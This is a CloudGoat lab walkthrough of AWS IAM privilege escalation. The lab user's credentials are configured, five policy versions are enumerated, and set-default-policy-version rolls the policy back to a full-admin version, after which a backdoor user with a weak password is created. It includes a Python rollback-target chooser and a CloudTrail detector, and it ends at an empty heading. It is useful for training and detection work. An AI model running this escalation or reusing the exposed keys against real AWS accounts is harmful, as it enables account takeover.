IAM PrivEsc - RollBack

Review the non-default versions of the customer-managed policy attached to the IAM user and roll back to a more permissive one to PrivEsc

Ultimate Goal

  • From an IAM User "Raynor" => To acquire full Admin Privileges

Getting Started

  • Deploy the lab via cloudgoat

cat /Users/d0p/Cloudgoat/iam_privesc_by_rollback_cgidq5mcziu8uh/start.txt
cloudgoat_output_aws_account_id = 242643118057
cloudgoat_output_policy_arn = arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh
cloudgoat_output_raynor_access_key_id = AKIATQ7VIE7UZGXOZL5K
cloudgoat_output_raynor_secret_key = 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
cloudgoat_output_username = raynor-iam_privesc_by_rollback_cgidq5mcziu8uh
  • We get raynor's access key and secret key - Let's configure an AWS CLI profile with them

aws configure --profile ray
AWS Access Key ID [None]: AKIATQ7VIE7UZGXOZL5K
AWS Secret Access Key [None]: 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
....
  • We now have a CLI profile named ray - Let's see if we have the privilege to create a demo user

aws iam create-user --user-name demo --profile ray
An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:iam::242643118057:user/raynor-iam_privesc_by_rollback_cgidq5mcziu8uh is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::242643118057:user/demo because no identity-based policy allows the iam:CreateUser action
  • Sadly, we can't create users - the error says no identity-based policy attached to raynor allows iam:CreateUser

  • Let's dig deeper by enumerating the managed policies attached to the IAM user raynor !

aws iam list-attached-user-policies --user-name raynor-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
    "AttachedPolicies": [
        {
            "PolicyName": "cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh",
            "PolicyArn": "arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh"
        }
    ]
}
  • Let's quickly make a note of that PolicyArn

  • Now that we know a single customer-managed policy is attached - let's try getting its policy version

aws iam get-policy-version --profile ray

usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:

  aws help
  aws <command> help
  aws <command> <subcommand> help

aws: error: the following arguments are required: --policy-arn, --version-id
  • Seems like we require both the policy ARN and a version id

  • Let's try getting that first !

aws iam list-policy-versions --profile ray

usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:

  aws help
  aws <command> help
  aws <command> <subcommand> help

aws: error: the following arguments are required: --policy-arn
  • Let's just paste the copied PolicyArn and list the version ids

aws iam list-policy-versions --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
    "Versions": [
        {
            "VersionId": "v5",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v4",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v3",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v2",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": true,
            "CreateDate": "2023-09-21T09:09:44+00:00"
        }
    ]
}
  • The policy attached to raynor has five versions (the maximum IAM keeps for a managed policy) and the default version is v1 - only the default version is evaluated when raynor's permissions are checked, the other four are dormant

  • Now that we know how many versions exist - Let's examine every version in detail via get-policy-version

aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v1 --profile ray 
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "iam:Get*",
                        "iam:List*",
                        "iam:SetDefaultPolicyVersion"
                    ],
                    "Effect": "Allow",
                    "Resource": "*",
                    "Sid": "IAMPrivilegeEscalationByRollback"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2023-09-21T09:09:44+00:00"
    }
}
  • V1 => Grants iam:Get*, iam:List* and iam:SetDefaultPolicyVersion on all resources. That is read-only IAM enumeration plus the single write action that chooses which version of a policy is active - the whole escalation primitive in one permission

aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v5 --profile ray
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": {
                "Effect": "Allow",
                "Action": [
                    "s3:ListBucket",
                    "s3:GetObject",
                    "s3:ListAllMyBuckets"
                ],
                "Resource": "*"
            }
        },
        "VersionId": "v5",
        "IsDefaultVersion": false,
        "CreateDate": "2023-09-21T09:09:46+00:00"
    }
}
  • V5 => Allows only s3:ListBucket, s3:GetObject and s3:ListAllMyBuckets - read-only S3, no IAM actions at all

aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v4 --profile ray
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": {
                "Effect": "Deny",
                "Action": "*",
                "Resource": "*",
                "Condition": {
                    "NotIpAddress": {
                        "aws:SourceIp": [
                            "192.0.2.0/24",
                            "203.0.113.0/24"
                        ]
                    }
                }
            }
        },
        "VersionId": "v4",
        "IsDefaultVersion": false,
        "CreateDate": "2023-09-21T09:09:46+00:00"
    }
}
  • V4 => Denies every action on every resource unless the request's source IP is inside 192.0.2.0/24 or 203.0.113.0/24 (both RFC 5737 documentation ranges, so effectively nowhere)

  • Rolling back to this version from any other address would lock raynor out completely - including out of iam:SetDefaultPolicyVersion, so there would be no way to roll forward again. Never pick it

aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v3 --profile ray
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": {
                "Effect": "Allow",
                "Action": "iam:Get*",
                "Resource": "*",
                "Condition": {
                    "DateGreaterThan": {
                        "aws:CurrentTime": "2017-07-01T00:00:00Z"
                    },
                    "DateLessThan": {
                        "aws:CurrentTime": "2017-12-31T23:59:59Z"
                    }
                }
            }
        },
        "VersionId": "v3",
        "IsDefaultVersion": false,
        "CreateDate": "2023-09-21T09:09:46+00:00"
    }
}
  • V3 => Allows only iam:Get*, and only while aws:CurrentTime falls between 2017-07-01 and 2017-12-31. That window closed long ago, so this version grants nothing today

aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v2 --profile ray
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Action": "*",
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v2",
        "IsDefaultVersion": false,
        "CreateDate": "2023-09-21T09:09:46+00:00"
    }
}
  • V2 => Grants unrestricted access: "Action": "*" on "Resource": "*" with no condition, i.e. full administrator within the AWS account
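The five version documents above can be triaged mechanically instead of by eye. The Python below is an added example for these notes (not part of CloudGoat or the original walkthrough): it embeds the five documents from the page as sample input so it runs offline, normalises the loose IAM JSON grammar (a bare object or a list for Statement, a string or a list for Action and Resource), and classifies each version as full-admin, lockout-risk, expired or limited so you can choose a rollback target without cutting yourself off. The classification rules are this example's own; document_from_cli() shows how real `aws iam get-policy-version` output would be fed in.

```python
"""Triage every version of a managed policy before rolling back.

Added example for these notes (not part of CloudGoat or the original
walkthrough). The sample input is the five version documents shown on the
page, embedded here so the script runs offline; in practice feed it the JSON
from `aws iam get-policy-version` via document_from_cli(). The classification
rules are this example's own, not an AWS API.
"""
import json
from datetime import datetime, timezone

# Constructed sample: the five version documents from the page, keyed by VersionId.
VERSIONS = {
    "v1": {"Version": "2012-10-17", "Statement": [{
        "Sid": "IAMPrivilegeEscalationByRollback", "Effect": "Allow",
        "Action": ["iam:Get*", "iam:List*", "iam:SetDefaultPolicyVersion"], "Resource": "*"}]},
    "v2": {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Action": "*", "Resource": "*"}]},
    "v3": {"Version": "2012-10-17", "Statement": {
        "Effect": "Allow", "Action": "iam:Get*", "Resource": "*",
        "Condition": {"DateGreaterThan": {"aws:CurrentTime": "2017-07-01T00:00:00Z"},
                      "DateLessThan": {"aws:CurrentTime": "2017-12-31T23:59:59Z"}}}},
    "v4": {"Version": "2012-10-17", "Statement": {
        "Effect": "Deny", "Action": "*", "Resource": "*",
        "Condition": {"NotIpAddress": {"aws:SourceIp": ["192.0.2.0/24", "203.0.113.0/24"]}}}},
    "v5": {"Version": "2012-10-17", "Statement": {
        "Effect": "Allow", "Action": ["s3:ListBucket", "s3:GetObject", "s3:ListAllMyBuckets"],
        "Resource": "*"}},
}


def document_from_cli(text):
    """Extract the policy document from raw `aws iam get-policy-version` JSON output."""
    return json.loads(text)["PolicyVersion"]["Document"]


def _as_list(value):
    """IAM JSON allows a bare string or a list for Statement, Action and Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def classify_version(document, now=None):
    """Return 'full-admin', 'lockout-risk', 'expired' or 'limited' for one policy document."""
    now = now or datetime.now(timezone.utc)
    verdict = "limited"
    for stmt in _as_list(document.get("Statement")):
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        cond = stmt.get("Condition") or {}
        if stmt.get("Effect") == "Deny" and "*" in actions and "*" in resources and "NotIpAddress" in cond:
            # Deny-everything unless the caller is inside an allow-listed CIDR: making this the
            # default from any other address cuts the current identity off completely, including
            # from iam:SetDefaultPolicyVersion, so there is no way back. Report it immediately.
            return "lockout-risk"
        if stmt.get("Effect") != "Allow":
            continue
        if "*" in actions and "*" in resources and not cond:
            verdict = "full-admin"
        elif "DateLessThan" in cond and verdict != "full-admin":
            # Time-boxed grant: worthless once the window has closed.
            end_raw = cond["DateLessThan"].get("aws:CurrentTime")
            if end_raw and datetime.fromisoformat(end_raw.replace("Z", "+00:00")) < now:
                verdict = "expired"
    return verdict


def choose_rollback_target(versions, now=None):
    """Newest version that grants unconditional full admin, or None if there is none."""
    for version_id in sorted(versions, key=lambda v: int(v.lstrip("v")), reverse=True):
        if classify_version(versions[version_id], now) == "full-admin":
            return version_id
    return None


if __name__ == "__main__":
    for vid in sorted(VERSIONS, key=lambda v: int(v.lstrip("v"))):
        print(vid, classify_version(VERSIONS[vid]))
    print("roll back to:", choose_rollback_target(VERSIONS))
```

Run against the documents from the page it reports v2 as full-admin, v4 as lockout-risk, v3 as expired and v1/v5 as limited, and picks v2 as the rollback target. The lockout check runs before the Allow check on purpose: a version that contains a global Deny with a source-IP condition is dangerous whatever else it grants.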

  • This is the version to roll back to - Let's make it the default using the iam:SetDefaultPolicyVersion permission v1 gives us !

aws iam set-default-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v2 --profile ray
  • set-default-policy-version prints nothing on success - let's cross-check that v2 is now the default with list-policy-versions

aws iam list-policy-versions --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
    "Versions": [
        {
            "VersionId": "v5",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v4",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v3",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v2",
            "IsDefaultVersion": true,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:44+00:00"
        }
    ]
}
  • Yes it is - the attached policy's default version is now v2, and since only the default version is evaluated, raynor is effectively an administrator without any policy having been attached, created or edited
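From the defender's side the whole escalation is one management event, iam:SetDefaultPolicyVersion, which CloudTrail logs like any other IAM call. The Python below is an added example for these notes (not part of CloudGoat or the original walkthrough) showing the detection logic: it parses a CloudTrail log file, keeps only SetDefaultPolicyVersion calls, and rates a call high severity when the principal is changing the default version of a policy attached to itself, which is exactly what raynor just did. The records are constructed to follow the CloudTrail field layout (eventSource, eventName, userIdentity, requestParameters, errorCode); the raynor and policy ARNs come from the page, while the event IDs, timestamps, source IPs, the intern user and the ci-deploy role are made up.

```python
"""Flag policy-version rollbacks in CloudTrail.

Added example for these notes (not part of CloudGoat or the original
walkthrough). Records are constructed to mirror the CloudTrail field layout;
the raynor and policy ARNs come from the page, everything else is made up.
"""
import json

ACCOUNT = "242643118057"
POLICY_ARN = f"arn:aws:iam::{ACCOUNT}:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh"
RAYNOR_ARN = f"arn:aws:iam::{ACCOUNT}:user/raynor-iam_privesc_by_rollback_cgidq5mcziu8uh"

# Constructed inventory, as `aws iam list-attached-user-policies` would report it, keyed by principal ARN.
ATTACHED_POLICIES = {RAYNOR_ARN: {POLICY_ARN}}

# Constructed CloudTrail log file (CloudTrail delivers events to S3 as a {"Records": [...]} document).
SAMPLE_LOG = json.dumps({"Records": [
    {"eventID": "00000000-0000-4000-8000-000000000001", "eventTime": "2023-09-21T09:30:12Z",
     "eventSource": "iam.amazonaws.com", "eventName": "SetDefaultPolicyVersion",
     "sourceIPAddress": "198.51.100.7", "userIdentity": {"type": "IAMUser", "arn": RAYNOR_ARN},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v2"}},
    {"eventID": "00000000-0000-4000-8000-000000000002", "eventTime": "2023-09-21T09:05:44Z",
     "eventSource": "iam.amazonaws.com", "eventName": "SetDefaultPolicyVersion",
     "sourceIPAddress": "198.51.100.9",
     "userIdentity": {"type": "IAMUser", "arn": f"arn:aws:iam::{ACCOUNT}:user/intern"},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v2"}, "errorCode": "AccessDenied"},
    {"eventID": "00000000-0000-4000-8000-000000000003", "eventTime": "2023-09-21T09:10:02Z",
     "eventSource": "iam.amazonaws.com", "eventName": "SetDefaultPolicyVersion",
     "sourceIPAddress": "203.0.113.20",
     "userIdentity": {"type": "AssumedRole", "arn": f"arn:aws:sts::{ACCOUNT}:assumed-role/ci-deploy/pipeline"},
     "requestParameters": {"policyArn": f"arn:aws:iam::{ACCOUNT}:policy/app-readonly", "versionId": "v3"}},
    {"eventID": "00000000-0000-4000-8000-000000000004", "eventTime": "2023-09-21T09:20:55Z",
     "eventSource": "iam.amazonaws.com", "eventName": "GetPolicyVersion",
     "sourceIPAddress": "198.51.100.7", "userIdentity": {"type": "IAMUser", "arn": RAYNOR_ARN},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v2"}},
]})


def triage_event(event, attached):
    """Return a finding for a SetDefaultPolicyVersion call, or None for any other event."""
    if event.get("eventSource") != "iam.amazonaws.com" or event.get("eventName") != "SetDefaultPolicyVersion":
        return None
    actor = event.get("userIdentity", {}).get("arn", "")
    params = event.get("requestParameters") or {}
    target = params.get("policyArn", "")
    # The tell-tale of this technique: a principal changing the default version of a policy
    # that is attached to itself. A role or admin maintaining someone else's policy is routine
    # change management and only merits a lower-severity review.
    self_escalation = target in attached.get(actor, set())
    return {
        "eventID": event.get("eventID"),
        "actor": actor,
        "policyArn": target,
        "versionId": params.get("versionId"),
        "selfEscalation": self_escalation,
        "denied": "errorCode" in event,  # denied calls are logged too and still indicate probing
        "severity": "high" if self_escalation else "medium",
    }


def scan_log(text, attached):
    """Parse one CloudTrail log file and return findings ordered by eventTime."""
    records = sorted(json.loads(text)["Records"], key=lambda r: r.get("eventTime", ""))
    return [f for f in (triage_event(r, attached) for r in records) if f is not None]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG, ATTACHED_POLICIES):
        print(finding["severity"].upper(), finding["actor"], "->", finding["policyArn"], finding["versionId"])
```

On the constructed log this yields three findings: the intern's denied attempt and the ci-deploy role's change to another policy at medium, and raynor's successful switch of its own policy to v2 at high. The GetPolicyVersion noise is ignored; the enumeration steps earlier on this page all land in CloudTrail as Get*/List* calls and are far too common to alert on by themselves.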

  • So now let's try to create a demo user with our new privileges

aws iam create-user --user-name demo --profile ray
{
    "User": {
        "Path": "/",
        "UserName": "demo",
        "UserId": "AIDATQ7VIE7URIBSBP5WG",
        "Arn": "arn:aws:iam::242643118057:user/demo",
        "CreateDate": "2023-09-21T09:34:09+00:00"
    }
}
  • It works !

  • But wait, let's cross-check that we really have full admin access by creating a console login profile for the demo user

aws iam create-login-profile --user-name demo --password Passw0rd --profile ray
{
    "LoginProfile": {
        "UserName": "demo",
        "CreateDate": "2023-09-21T09:35:59+00:00",
        "PasswordResetRequired": false
    }
}
  • To log in to the console we also need the AWS account ID, which is in start.txt

cat iam_privesc_by_rollback_cgidq5mcziu8uh/start.txt
cloudgoat_output_aws_account_id = 2x264x118x57
........

Exploitation Route
